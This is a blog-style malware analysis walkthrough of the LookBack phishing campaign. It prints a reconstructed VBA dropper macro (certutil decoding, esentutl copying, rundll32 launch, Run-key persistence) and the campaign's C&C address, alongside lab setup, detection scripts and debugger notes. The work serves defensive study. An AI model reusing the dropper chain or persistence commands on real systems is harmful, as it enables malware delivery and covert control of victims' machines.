Taking a closer look at the LookBack Malware Campaign

If you follow my posts on LinkedIn, you might recall an article I shared about a week or two ago about a new malware campaign that was uncovered, targeting ICS companies in the US utilities industry. If you missed the post or want to reread the article, here is the link: https://arstechnica-com.cdn.ampproject.org/c/s/arstechnica.com/information-technology/2019/08/new-advanced-malware-possibly-nation-sponsored-is-targeting-us-utilities/?amp=1.

In the article the campaign is tentatively attributed to a Chinese Advanced Persistent Threat (APT) group, APT10 or "MenuPass". The whole process of classifying and attributing a malware campaign would in and of itself make a fascinating blog post; however, I would like to use our time to take a closer look at the infection process behind the LookBack campaign. How exactly does an email with an attached Microsoft Word document infect your system, and what does the malware do once it's executed?

A word of caution up front: we will be playing with live malware that has somebody or something listening on the receiving end. If you're going to follow along, make sure you have a properly set up malware analysis lab. I might do a separate blog post on that in the future; for now, take a look at the following write-up on creating a virtual malware analysis lab: https://www.haloforensics.com/?p=48.

For the task at hand, I set up a small virtual lab within VMware Workstation, consisting of an isolated virtual network (using a Host-Only virtual NIC, without assigning a NIC to the host), an up-to-date copy of REMnux (https://remnux.org/) and a highly customized Windows 8 virtual machine to run the malware on (called the scapegoat or malware machine). Why Windows 8? Because I built that to perfection a few years ago and I haven't gotten around to doing the work on a Windows 10 VM yet.

Because pictures always help drive the message home, here is a depiction of the Virtual Lab I'll be using:


Our sacrificial lamb, the windows 8 machine where we will run the malware, is configured to be able to reach the internet via the REMnux machine only (using it as the default gateway). This allows any network traffic to be sniffed and recorded by the REMnux VM on its way out.

Let's get cracking.

The above-mentioned article doesn't go into much technical detail about the malware itself, as it is written more as a cautionary tale. It does, however, provide a link to the malware analysis write-up by Proofpoint: https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks.
The write-up is a pretty thorough guide to the infection process and to the malware itself. I will follow Proofpoint's methodology of analysis but make some detours and deep dives at certain stages to look at things from another angle and see if we can find more details about the ultimate purpose of the campaign and the malware.

As explained in both articles, the campaign uses a spear phishing email as its attack vector. The figure below shows a screenshot of an email as received by one of the targeted individuals. The email is tailored to trick the receiving engineers into opening the attached Word document by convincing them that they failed their certification exam. Even though we are all trained and warned not to open email attachments from unknown sources, (spear) phishing emails remain a very effective way to deliver a malicious payload, especially when professionally crafted for the intended audience.


Email Screenshot, Created by Proofpoint

As a side note, since I didn't receive this email myself, I had to find some other way to get hold of the email, the Word document or the malware files for analysis. For obvious reasons Proofpoint did not include any links in their article, so I had to resort to other means. This turned out to be harder than I expected. I started by looking for clues in the articles I read on the campaign. Proofpoint conveniently included Indicators of Compromise (IOCs) at the end of the article:


I grabbed the SHA256 hash for the word document (a2d41af0b4f8f0fd950fd4ac164cb2c836fd3c679688b4db75e85ffabfc20d94) and went to https://www.virustotal.com to see if the file had been analyzed before. And sure enough, VirusTotal came up with the following result when looking up the hash value:


However, I didn't see any obvious way to download a sample from them. Apparently, you must be vetted, processed and approved before you are allowed to download samples. With that, if any of you can point out how to start that process, please respond with some advice. Next stop, https://www.hybrid-analysis.com/, with a similar result: the site didn't have the Word document analyzed but did have an entry for the malicious GUP.EXE hash. Hybrid Analysis also requires you to be vetted and approved before you can download the sample, but their process for doing this is much more straightforward. I started the vetting process with them and moved on.

I finally managed to strike gold at https://app.any.run/, a fantastic online resource for malware analysis. It allows you to run the whole process on their systems. If you haven't tried them, you should. Anyway, after finding the SHA256 hash in their public submission records, the service allowed me to download the "result notice.doc" Word document that is attached to the phishing email:


Now the real fun can start.

I copied the password-protected zip file with the Word document onto the Windows 8 malware VM, where it is safe to extract and look at. Seeing as this is a Word document, I instinctively start looking for OLE (Object Linking and Embedding) information. My go-to tools for OLE exploration are the Python "oletools" from http://decalage.info/python/oletools. They are easily installed by running "pip install oletools" and give you the means to parse OLE and OpenXML files such as MS Office documents. For example, running "olemeta" on the malicious Word document shows us the following information:


We can see details such as creation time, last modified date and time and the author here. Hmm, a failure notice that contains a single word….

Let's enumerate the types of objects in the word document to see if anything stands out. We use a tool developed by Didier Stevens "oledump.py" (https://blog.didierstevens.com/programs/oledump-py/) for the task:


Right away we can see that the Word document contains a macro (indicated by the 'M' in the screenshot). If finding macros in Office documents doesn't alarm you by itself, the fact that 98% of the document is, in fact, dedicated to the macro should. This is highly suspicious, to say the least. Let's extract the macro content from the Word document and see what it is all about.

We could use oledump.py for the task but I prefer to run "olevba" from the oletools set as it does a cleaner job. So, let's throw that command at the word document. I will pipe the output into a text file as the sheer amount of tool output is too large for review in the terminal:

olevba.exe 'C:\Users\pac\Desktop\result notice.doc' > C:\Users\pac\workdir\temp\vba.txt

Wow, the olevba tool generated a 5 MB text file! Looking at the output, we see large sections where variables are initialized to blobs of seemingly random text.


As can be seen in the screenshot above, after the declaration of each variable its contents are written out to a .txt file. After the variable declarations we see the body of the macro, shown in the screenshot below:


The authors of the macro "obfuscate" its intent by splitting the command strings into chunks. If we "de-obfuscate" the macro it looks like this:

Sub nRun()
    Set o = CreateObject("WScript.Shell")
    Set fso1 = CreateObject("Scripting.FileSystemObject")

    n = "pense1.txt"
    n2 = "pense2.txt"
    n3 = "sodom.txt"
    n4 = "pense3.txt"

    Z = "$tmp$\pense1.txt"
    z2 = "$tmp$\pense2.txt"
    z3 = "$tmp$\sodom.txt"
    z4 = "$tmp$\pense3.txt"

    ' pense3.txt is appended to pense2.txt so the two decode as one blob
    o.Run "cmd /c type $tmp$\pense3.txt >> $tmp$\pense2.txt", 0, True
    ' copy certutil.exe under an innocuous name; note the missing backslash after %tmp%:
    ' the copy lands as ...\AppData\Local\Temptcm.tmp (the Noriben log confirms this)
    o.Run "cmd /c copy %windir%\system32\certutil.exe %tmp%tcm.tmp", 0, True

    ' certutil -decode: base64-decode each text file
    o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\pense1.txt %tmp%GUP.txt", 0, True
    o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\pense2.txt %tmp%GUP2.txt", 0, True
    o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\sodom.txt %tmp%sodom.txt", 0, True

    ' esentutl /y <src> /d <dst> /o: a plain file copy into C:\Users\Public
    o.Run "esentutl.exe /y %tmp%GUP.txt /d C:\Users\Public\GUP.exe /o", 0, True
    o.Run "esentutl.exe /y %tmp%GUP2.txt /d C:\Users\Public\libcurl.dll /o", 0, True
    o.Run "esentutl.exe /y %tmp%sodom.txt /d C:\Users\Public\sodom.txt /o", 0, True

    ' start the proxy and load the DLL through ordinal export #52
    o.Run "C:\Users\Public\GUP.exe", 0, False
    o.Run "rundll32.exe C:\Users\Public\libcurl.dll,#52", 0, False

    ' persistence: per-user Run key entries for both
    o.Run "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d ""rundll32.exe C:\Users\Public\libcurl.dll,#52""", 0, True
    o.Run "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d ""C:\Users\Public\GUP.exe""", 0, True
End Sub

Private Sub Document_Open()
    AddDsRun      ' these three write the embedded blobs out as text files
    OasbjRdun
    n1Run
    nRun          ' then decode, copy, launch and persist
End Sub


In short, the macro starts at Document_Open() when we, well, open the document. The first three calls (AddDsRun, OasbjRdun and n1Run) are the variable-declaration and text-file-creation routines. After those complete, nRun is called. It first appends pense3.txt to pense2.txt in the $tmp$ folder (C:\Users\pac\AppData\Local\Temp), since that blob is split across two files, and copies certutil.exe from system32 under the innocuous name tcm.tmp. The copied certutil.exe is then run with its -decode switch, which (per Microsoft's certutil documentation) base64-decodes a file, turning the text files into binaries. Next, the macro uses the Windows-native esentutl.exe in its /y (copy file) mode to copy the decoded files into the C:\Users\Public folder as GUP.exe, libcurl.dll and sodom.txt; no decryption happens here, esentutl.exe is simply a living-off-the-land way to copy a file. The script then starts the newly created GUP.exe and libcurl.dll (notice that exported function #52 is called via rundll32.exe). The macro finishes by setting up persistence for both via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key.

The rest of the olevba tool output shows the many suspicious indications the tool found while parsing the macro content:


Now that we have a pretty good understanding of what the Word document will do once we open it, it is time to launch and observe the malware in action. Before we do this though, we should prepare the environment:

First, we need to configure the REMnux VM as the gateway out of the isolated VM network. For this purpose, the REMnux VM is equipped with two virtual network interfaces, eth0 and eth1. Eth0 is attached to the isolated network and eth1 is connected to the internet. The following bash script configures the system to forward and NAT any packets sent to the eth0 interface:

"ip-forwarding.sh"

#!/bin/bash
# ip-forwarding.sh: turn the REMnux VM into a NAT gateway for the isolated lab network.
# eth0 = isolated lab network (172.20.20.0/24), eth1 = internet-facing interface.
sudo sysctl -w net.ipv4.ip_forward=1          # a bare "echo > /proc/..." fails without root
sudo iptables -F FORWARD                      # start clean so re-running does not stack rules
sudo iptables -A FORWARD -i eth0 -o eth1 -s 172.20.20.0/24 -m conntrack --ctstate NEW -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -F POSTROUTING
sudo iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

The Windows 8 'malware' VM will need to be configured with the address of eth0 on the REMnux machine as its default gateway. As DNS server we will use 8.8.8.8.


Next, we will run Wireshark for full packet capture during the analysis process as well as launch a python script that catches DNS queries by sniffing eth0 traffic. The following is the listing of the dns-sniffer.py script I used:

#!/usr/bin/env python3
# dns-sniffer.py: print every DNS query seen on the chosen interface.
# Sniffing needs root; run it with sudo on the REMnux VM.
import sys
from scapy.all import *

try:
    IFACES.show()                                   # prints the interface table (returns None)
    interface = input("[*] Interface to use for sniffing: ")
except KeyboardInterrupt:
    print("[*] Keyboard interrupt detected...")
    print("[*] Shutting down...")
    sys.exit(1)

def sniffcallback(pkt):
    # report queries only (qr == 0), not the responses coming back
    if IP in pkt and pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:
        qd = pkt.getlayer(DNS).qd
        if qd is None:
            return
        qname = qd.qname
        if isinstance(qname, bytes):               # scapy hands back bytes on Python 3
            qname = qname.decode("ascii", "replace")
        print("%s -> %s : {%s}" % (pkt[IP].src, pkt[IP].dst, qname))

try:
    sniff(iface=interface, filter="port 53", prn=sniffcallback, store=0)
except KeyboardInterrupt:
    print("[*] Keyboard interrupt detected...")
    print("[*] Shutting down...")

When you run the Python script it starts displaying all the DNS queries the REMnux VM sees on the isolated VM network (the ones sent from our malware machine). You can see these in Wireshark as well, but I find it convenient to have this script running on the side.


On the Windows 8 VM, before executing the malicious Word document, I am going to run the Noriben Python script. From https://github.com/Rurik/Noriben: "Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run an application, hit a keypress, and get a simple text report of the sample's activities". This script basically logs any interesting actions the malware performs via the Sysinternals Procmon tool and presents them in an easy-to-read output. Let's start the script:

PS C:\Users\pac\workdir\python\Noriben> dir

    Directory: C:\Users\pac\workdir\python\Noriben

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----        10/20/2017   3:57 PM            Sample
-a---        10/20/2017   3:38 PM      59079 Noriben.py
-a---        10/20/2017   3:38 PM       3410 NoribenRead.py
-a---        10/20/2017   3:38 PM       1835 NoribenSandbox.bat
-a---        10/20/2017   3:38 PM      18409 NoribenSandbox.py
-a---        10/20/2017   3:38 PM       2424 NoribenSandbox.sh
-a---        10/20/2017   3:38 PM        205 postexec.txt
-a---        10/20/2017   3:38 PM      21316 ProcmonConfiguration.pm
-a---        10/20/2017   3:38 PM      20746 ProcmonConfiguration_ex
-a---        10/20/2017   3:38 PM      20068 ProcmonConfiguration_hi
-a---        10/20/2017   3:38 PM      18214 ProcmonConfiguration_me
-a---        10/20/2017   3:38 PM       6846 README.md

PS C:\Users\pac\workdir\python\Noriben> python .\Noriben.py

--===[ Noriben v1.7.2
--===[ @bbaskin
[*] Using filter file: ProcmonConfiguration.PMC
[+] Features: (Debug: False   YARA: False   VirusTotal: False)
[*] Using procmon EXE: c:\tools\procmon.exe
[*] Procmon session saved to: Noriben_16_Aug_19__12_59_40_253000.pml
[*] Launching Procmon ...
[*] Procmon is running. Run your executable now.
[*] When runtime is complete, press CTRL+C to stop logging.

Now we have everything in place to record the actions the malware might take. Let's open the malicious Word document and see what happens. At first, we are presented with an "enable content" security warning:


Needless to say at this point that you should never, ever allow a macro to run unless you are absolutely certain of the content and origin of the Office document, and certainly not for a file someone sent via email! But let's be foolish and, for this exercise, allow the macro to run. I clicked "Enable Content" and, after about 30 seconds of hourglass cursor and nothing else obvious going on, I now see this screen:


Except for the missing security warning, not much has changed on the malware machine, at least nothing obvious. On the REMnux VM we see a ton of traffic from the malware machine to the following IP address: 103.253.41[.]45, which was indicated by the articles to be the Command and Control (C&C) server for the campaign.


Noteworthy is that the IP address appears to be hard-coded into the malware, as there is no DNS request resolving to it before communications start. This breaks communication with the C&C if the server is taken down, but it also makes for a very effective Indicator of Compromise (IOC).

If we look up the C&C IP address on VirusTotal (https://www.virustotal.com/gui/ip-address/103.253.41.45/details) we find an association with the LookBack malware. We knew this up front, but in a regular malware analysis session this is valuable information that should be gathered.

Finally, notice how the malware uses a POST request to http://103.253.41[.]45/status.gif?r=xxxxxxx to communicate with the C&C server. The xxxxxxx part of the URL is an increasing number, likely to keep track of requests.
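As an added example (not code from the original post or from Proofpoint), here is a small parser that picks these beacons out of proxy-style request logs and checks the two properties noted above: the hard-coded C&C address and the increasing counter. The log lines, timestamps and client address are constructed; the request shape (POST to /status.gif?r=N on 103.253.41.45) is the one seen in the capture.

```python
from urllib.parse import urlsplit, parse_qs

# Hard-coded C&C address observed in the capture; no DNS lookup precedes it
C2_HOSTS = frozenset({"103.253.41.45"})

# Constructed proxy-style request log: "HH:MM:SS src_ip METHOD url" (not a real capture)
SAMPLE_LOG = """\
12:00:01 172.20.20.10 POST http://103.253.41.45/status.gif?r=1000
12:00:31 172.20.20.10 POST http://103.253.41.45/status.gif?r=1001
12:00:45 172.20.20.10 GET http://example.com/index.html
12:01:01 172.20.20.10 POST http://103.253.41.45/status.gif?r=1002
12:01:31 172.20.20.10 POST http://103.253.41.45/status.gif?r=1003
"""


def seconds(hms):
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s


def is_beacon(method, url):
    """Match on the known C2 host or on the request shape, so a server move still trips the rule."""
    u = urlsplit(url)
    q = parse_qs(u.query)
    if u.hostname in C2_HOSTS:
        return "host", q
    if method == "POST" and u.path == "/status.gif" and "r" in q:
        return "pattern", q
    return None, q


def find_beacons(log_text):
    """Collect beacon requests (assumed: one client per log) and summarise their cadence."""
    beacons = []
    for line in log_text.splitlines():
        ts, src, method, url = line.split(maxsplit=3)
        how, q = is_beacon(method, url)
        if how is None:
            continue
        r = q.get("r", [""])[0]
        beacons.append({"t": seconds(ts), "src": src, "matched_by": how,
                        "counter": int(r) if r.isdigit() else None})
    counters = [b["counter"] for b in beacons if b["counter"] is not None]
    intervals = [b["t"] - a["t"] for a, b in zip(beacons, beacons[1:])]
    return {
        "beacons": beacons,
        # the r= value should only ever go up if it is a request counter
        "counter_increasing": all(a < b for a, b in zip(counters, counters[1:])),
        "intervals": intervals,
        # a fixed-interval beacon has near-zero jitter; real browsing does not
        "jitter": max(intervals) - min(intervals) if intervals else 0,
    }


if __name__ == "__main__":
    summary = find_beacons(SAMPLE_LOG)
    print(len(summary["beacons"]), "beacons, intervals", summary["intervals"],
          "counter increasing:", summary["counter_increasing"])
```

The host match is the IOC from the post; the pattern match is what you would keep once the address changes, which is exactly the weakness of a hard-coded C&C noted above.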

After letting the malware run for a while (I waited 15 minutes) we will close the Noriben script (with CTRL+C) and have it generate the report with findings:


The full contents of the Noriben report are listed at the end of this article. In summary, the Word document (WINWORD.EXE) is witnessed creating text files and copying a Windows executable (certutil.exe) into the user's AppData\Local folder as Temptcm.tmp, then decoding the text files with that copy and copying the results into C:\Users\Public as executable files (GUP.exe and libcurl.dll) with esentutl.exe. Finally, the newly created executables are started and made persistent via the registry Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run).
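A detection rule for this chain, as an added example (not from the original post or Proofpoint): it runs over process-creation lines in the Noriben format shown in the appendix and tags the living-off-the-land steps the macro uses. The sample lines are constructed from the macro's commands; the PIDs and the last three lines are made up.

```python
import re

OFFICE_HOSTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "esentutl.exe"}
LINE_RE = re.compile(r'^\[CreateProcess\] (?P<parent>[^:]+):(?P<ppid>\d+) > '
                     r'"(?P<cmd>.*)" \[Child PID: (?P<pid>\d+)\]$')

# Constructed sample in the Noriben "Processes Created" format (PIDs made up)
SAMPLE = r"""
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\splwow64.exe 8192" [Child PID: 944]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c type %LocalAppData%\Temp\pense3.txt>>%LocalAppData%\Temp\pense2.txt" [Child PID: 3232]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c copy %WinDir%\system32\certutil.exe %LocalAppData%\Temptcm.tmp" [Child PID: 3660]
[CreateProcess] cmd.exe:3708 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3444]
[CreateProcess] WINWORD.EXE:3252 > "esentutl.exe /y %LocalAppData%\TempGUP.txt /d C:\Users\Public\GUP.exe /o" [Child PID: 1901]
[CreateProcess] cmd.exe:2000 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d C:\Users\Public\GUP.exe" [Child PID: 2001]
[CreateProcess] explorer.exe:1000 > "%WinDir%\System32\notepad.exe" [Child PID: 1001]
"""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(parent, cmd):
    """Return the set of suspicious traits of one process-creation event."""
    tokens = cmd.split()
    exe = basename(tokens[0])
    low = cmd.lower()
    tags = set()
    if parent.upper() in OFFICE_HOSTS and exe in LOLBINS:
        tags.add("office_spawns_lolbin")          # Office has no business launching these
    if "-decode" in {t.lower() for t in tokens}:
        tags.add("certutil_decode")               # certutil's base64 decode switch
        if exe != "certutil.exe":
            tags.add("renamed_lolbin")            # the macro ran its copy as tcm.tmp
    if exe == "cmd.exe" and " copy " in low and "certutil.exe" in low:
        tags.add("lolbin_copied")                 # staging a copy of certutil elsewhere
    if exe == "esentutl.exe" and " /y " in low and " /d " in low:
        tags.add("esentutl_file_copy")            # esentutl /y <src> /d <dst> copies a file
    if "reg add" in low and "\\currentversion\\run" in low:
        tags.add("run_key_persistence")
    return tags


def scan(text):
    """Yield (child PID, sorted tags) for every flagged CreateProcess line."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tags = classify(m["parent"], m["cmd"])
        if tags:
            hits.append((int(m["pid"]), sorted(tags)))
    return hits


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE):
        print(pid, ", ".join(tags))
```

The renamed-binary check matters most: a rule that only keys on the image name certutil.exe misses this sample entirely, because the macro copies the binary to tcm.tmp before using it.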

Let's take a closer look at the files that were created. Using a python script, vt.py (install via pip install vt) we can, among many more actions, upload executables to VirusTotal from the command prompt:


PS C:\Users\Public> vt -f .\GUP.exe -v

Calculating hash for: .\GUP.exe
Scanned on :
2019-08-16 09:45:51
Detections:
39/66 Positives/Total
Results for MD5 : 6421d130295cc111af4b5a35c8fed3ab
Results for SHA1 : a7cc6118fc6dfa88cde869e5f98af4c58cf35c5a
Results for SHA256 : 0f951b7a68e9c0984a0bee3c44e2d64aeac6320bbc2ba2a0f1420893550cf441

Verbose VirusTotal Information Output:
+-------------------+-----------+----------------------------------+----------------------+--------------+
| Vendor name | Detected | Result | Version | Last Update |
+===================+===========+==================================+======================+==============+
| ALYac | True | Trojan.GenericKD.41521765 | 1.1.1.5 | 20190816 |


OK, those results definitely confirm the maliciousness of the file. Something that stands out, though, is that the executable has a different SHA256 hash than the one identified in the Proofpoint report. We will see why in a bit.

Next, lets inspect GUP.exe in pestudio. Pestudio (https://www.winitor.com/) is a utility that can be used to inspect PE files for malicious characteristics. I literally do not leave home without it. Any system I have has this command under the right-mouse context menu. It allows me to check anything I do not trust with a single click. Pestudio performs a large variety of checks on a PE file and allows us to see details about the nature of the executable:


Pestudio flags the GUP.exe file on several suspicious indicators:


Looking at the file details tab in the screenshot above, one thing that stands out immediately is the signature indicating this is a UPX compressed file:


Verified by the entry-point listing of the file:


So, what does UPX compression mean? To make an executable smaller, a developer can run the UPX packer on it, shrinking it much like a zip file. This saves space on disk, but before the original code can run, a small stub at the entry point has to decompress the file in memory; that stub is what we see indications of in the pestudio output.

A side effect of packing an executable is that resources like strings and import declarations get compressed as well, effectively hiding them from prying eyes. As mentioned, UPX is used for legitimate purposes, but its presence should make a malware analyst very suspicious. To see the effect of UPX, let's look at the imports of GUP.exe with the PEview.exe utility (https://www.aldeid.com/wiki/PEView):


Not much to see here. Just enough functionality to UPX decompress the file. We can use a standalone version of the UPX tool (https://upx.github.io/) to decompress our GUP.exe file:


PS C:\Users\Public> upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-o FILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

PS C:\Users\Public> upx -d .\GUP.exe -o GUP-d.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017

File size Ratio Format Name
-------------------- ------ ----------- -----------
102912 <- 50688 49.25% win32/pe GUP-d.exe

Unpacked 1 file.


Now when we look at the decompressed executable (GUP-d.exe), we can see a whole lot more details:


I ran the same decompression on the libcurl.dll file as it also showed UPX characteristics, and created libcurl-d.dll.

As a side note, after decompression the SHA256 hash values of the resulting files are identical to the IOCs reported by Proofpoint:


PS C:\Users\Public> sha256deep64.exe .\GUP-d.exe
368ae77c829c29db2c3e719ce423104db86165422391403ad0483944aa287c20 C:\Users\Public\GUP-d.exe

PS C:\Users\Public> sha256deep64.exe .\libcurl-d.dll
cf57eb331b09cb2bc8992ea253d301161f1fa38583cba0733ea6dc2da2bdf740 C:\Users\Public\libcurl-d.dll


When we run Pestudio on the decompressed libcurl-d.dll file, it shows the exports for the dll file, with export 52 highlighted:


Recall from the macro analysis and the output of the Noriben script that on launch, exported function 52 is of importance. We will use this information later on in our dynamic analysis of the dll.


It is time to switch gears a bit. Let's look at the executables running in memory after infection. For example, GUP.exe (the running copy started by WINWORD.EXE, not the decompressed one in the Public folder) can be examined with Sysinternals Process Explorer:


Details like location, parent PID and startup type can be discovered via the properties panel of Process Explorer. We already know these details from the static analysis we did before, but it's good to see them verified here. The TCP/IP tab in the screenshot above, however, shows a new detail to explore: GUP.exe has created TCP/IP sockets. There is a listening socket on port 9090 (with an established connection instance) and a socket connected to the C&C IP address we discovered earlier. Combining what we read in the articles about the LookBack malware with this behavior, backed by some debugging exercises performed on the decompressed executable, I conclude that GUP.exe is mainly a 'man in the middle' or proxy utility that brokers communications to and from the C&C server. The rest of the article concentrates on the libcurl.dll file.

The libcurl.dll file is loaded via rundll32.exe and can be found by using the search function of Process Explorer, looking for the file:


The libcurl.dll TCP/IP properties tab shows it is connected to our GUP.exe process via port 9090 (both sides show the same IP address and TCP port combination):
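An added detection example (not the post's own code) for the pattern just described: given netstat -ano style output and a PID-to-name map, find a process that talks to a loopback listener owned by a different process which in turn holds a connection to an external address. The netstat rows and PIDs are constructed; the port (9090) and the C&C address are the ones seen in Process Explorer and the packet capture.

```python
import ipaddress

# Constructed netstat -ano style output and PID map (PIDs made up)
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:9090           0.0.0.0:0              LISTENING       2876
  TCP    127.0.0.1:9090         127.0.0.1:49211        ESTABLISHED     2876
  TCP    127.0.0.1:49211        127.0.0.1:9090         ESTABLISHED     3120
  TCP    172.20.20.10:49215     103.253.41.45:80       ESTABLISHED     2876
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    172.20.20.10:49300     8.8.8.8:443            ESTABLISHED     4012
"""
PROCS = {2876: "GUP.exe", 3120: "rundll32.exe", 812: "svchost.exe", 4012: "chrome.exe"}


def split_addr(text):
    host, port = text.rsplit(":", 1)          # handles [::]:135 as well as 0.0.0.0:9090
    return host.strip("[]"), int(port)


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        rows.append({"local": split_addr(parts[1]), "remote": split_addr(parts[2]),
                     "state": parts[3], "pid": int(parts[4])})
    return rows


def is_external(ip):
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_unspecified)


def find_proxy_chains(rows, procs):
    """Report client -> loopback listener -> external host chains where the listener
    belongs to a different process than the client (GUP.exe brokering for rundll32.exe)."""
    listeners = {r["local"][1]: r["pid"] for r in rows if r["state"] == "LISTENING"}
    external = {}
    for r in rows:
        if r["state"] == "ESTABLISHED" and is_external(r["remote"][0]):
            external.setdefault(r["pid"], []).append("%s:%d" % r["remote"])
    chains = []
    for r in rows:
        rip, rport = r["remote"]
        if r["state"] != "ESTABLISHED" or not ipaddress.ip_address(rip).is_loopback:
            continue
        owner = listeners.get(rport)
        # skip the server half of the loopback pair and listeners with no outbound leg
        if owner is None or owner == r["pid"] or owner not in external:
            continue
        chains.append({"client": procs.get(r["pid"], "?"), "client_pid": r["pid"],
                       "proxy": procs.get(owner, "?"), "proxy_pid": owner,
                       "local_port": rport, "remote": external[owner]})
    return chains


if __name__ == "__main__":
    for c in find_proxy_chains(parse_netstat(NETSTAT), PROCS):
        print("%s (%d) -> 127.0.0.1:%d %s (%d) -> %s" % (
            c["client"], c["client_pid"], c["local_port"], c["proxy"], c["proxy_pid"], c["remote"]))
```

On a live host the PID map comes from tasklist or Get-Process; the interesting part of the output is a rundll32.exe that never talks to the internet itself yet has a loopback partner that does.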


What exactly is the DLL doing? Looking at the Wireshark packet capture more closely reveals a beacon-style communication pattern to the C&C server: communications at regular intervals, but the packet contents are either gibberish or encrypted. To see what the capabilities of the DLL are, we will have to reverse engineer it. I will be using an old-time favorite of many a reverse engineer, the OllyDbg debugger (http://www.ollydbg.de/). OllyDbg is an extremely handy tool; to this day it never ceases to amaze me how capable it is. I am using an optimized version of the debugger, kindly provided by R4ndom (https://tuts4you.com/e107_plugins/download/download.php?list.97, Tutorial 3 download). R4ndom's version of OllyDbg contains bug fixes and plugins that help thwart any anti-reversing tricks the malware might perform. Let's load the DLL and call the suspicious export:

NOTE: If you are going to follow along with the analysis process, keep in mind that your memory locations, pointers and addresses will likely be different than the ones shown in the following screenshots. This is because of the intentional variance in mapping code into memory (ASLR) and Windows memory management in general.

Start OllyDbg, open the libcurl-d.dll file and press 'run (F9)' to initialize the dll. Next go to the debug menu and select: "Call dll export". The following screen will popup that allows you to specify what exported function to call:


Choose the curl_share_init exported function and click Call, then close this popup screen. The OllyDbg CPU screen will now be paused at the curl_share_init function's main routine (my screenshot contains comments and breakpoints from the ongoing analysis):


curl_share_init - Main routine

The assembly code shown in the screenshot above is the main routine for the exported curl_share_init function. The routine starts with identifying the start of the memory section it is running in via the Windows VirtualQuery API call. Next, it retrieves the memory mapped module name via GetModuleFileName. It then allocates a 0x4f0 (1264) byte large section in memory for later use (we will call the section MEM1 for convenience).

Next, curl_share_init calls, what I have called the "DecryptCode" function:


The DecryptCode function fills MEM1 with data from the resource section of the dll file. It then goes through the process of decrypting the copied data, into assembly instructions. You see this decryption process in progress in the screenshot below. The highlighted section on the left represents the decoded data, the area below it is not decoded yet.


Once DecryptCode has copied and decoded all data into instructions in MEM1, program execution returns to the main routine of curl_share_init. Here, the program sets an offset into the decoded MEM1 section and directs program execution to that location:


curl_share_init - Main routine

The screenshot below shows the assembly code where program execution is directed to:


MEM1 - Contents

Let's see what this additional code that gets created on the fly, does.

The first thing we see happen here is the program retrieving the addresses of the kernel32.dll functions LoadLibrary and GetProcAddress from the stack (looking at the previous screenshots, the main routine of curl_share_init put them there). It then calls LoadLibrary for kernel32.dll. Since kernel32.dll is already mapped into every user-mode process, this call loads nothing new; it simply hands this position-independent code a module handle it can feed to GetProcAddress, which is how code without an import table of its own gets at the Windows API.


MEM1 - Main routine

With Kernel32.dll loaded into its memory space, the program now starts mapping a predefined list of functions and builds a function list on the stack:


After building the function list, program execution is directed to the 001F0370 subroutine. In this subroutine the mapped functions are used to find a resource in the libcurl-d.dll memory space. That resource is extracted, some memory is allocated, and the resource content copied into the new memory location (calling this one MEM2). The screenshot below shows the listing for this functionality. The comments were derived from cross referencing the code to the function list and adding arguments from the MSDN documentation of the called API function:


The below screenshot shows the content of newly created memory section MEM2 (likely still encrypted):


MEM2 - Content

With memory section MEM2 created the code in MEM1 calls the subroutine 001F0000, most likely to decrypt the data in MEM2:


As it turns out, subroutine 001F0000 does exactly that, it decrypts the data of MEM2 into assembly code. The figure above shows the second stage of the decryption process, revealing the code in the allocated memory (shown to the right of the screenshot). I renamed subroutine 001F0000 to DecryptAllocatedMemory.

